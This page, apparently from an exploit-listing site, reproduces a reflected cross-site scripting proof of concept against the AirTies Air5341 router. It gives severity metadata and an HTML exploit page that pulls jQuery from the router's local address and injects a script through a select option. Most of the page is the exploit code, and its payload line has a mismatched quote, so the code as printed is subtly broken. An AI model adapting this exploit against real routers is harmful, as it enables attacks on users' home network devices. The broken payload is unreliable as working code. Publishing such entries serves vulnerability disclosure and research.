Advertisement






AirTies Air5341 XSS Reflected JQuery 1.4.2

CVE Category Price Severity
CWE-79 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-12-26
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018120222

Below is a copy:

AirTies Air5341 XSS Reflected JQuery 1.4.2
# Exploit Title: AirTies Air5341 XSS Reflected JQuery 1.4.2
# Date: 10-09-2017
# Exploit Author: Alican Gnll - God3err
# Version: AirTies Air5341 Firmware 1.0.0.12
# Tested on: Komutan Linux - Debian

Exploits :
----------------------------

<html>
<head>
  <meta charset="utf-8">
  <title>God3err XSS Protect </title>
  <script src="http://192.168.2.1/js/jquery.js"></script>
  <script>
    $(function() {
      $('#users').each(function() {
        var select = $(this);
        var option = select.children('option').first();
        select.after(option.text());
        select.hide();
      });
    });
  </script>
</head>


<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script>alert('God3err Xss Founded;);</script></option>
      </select>
    </p>
  </form>
</body>
</html>

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum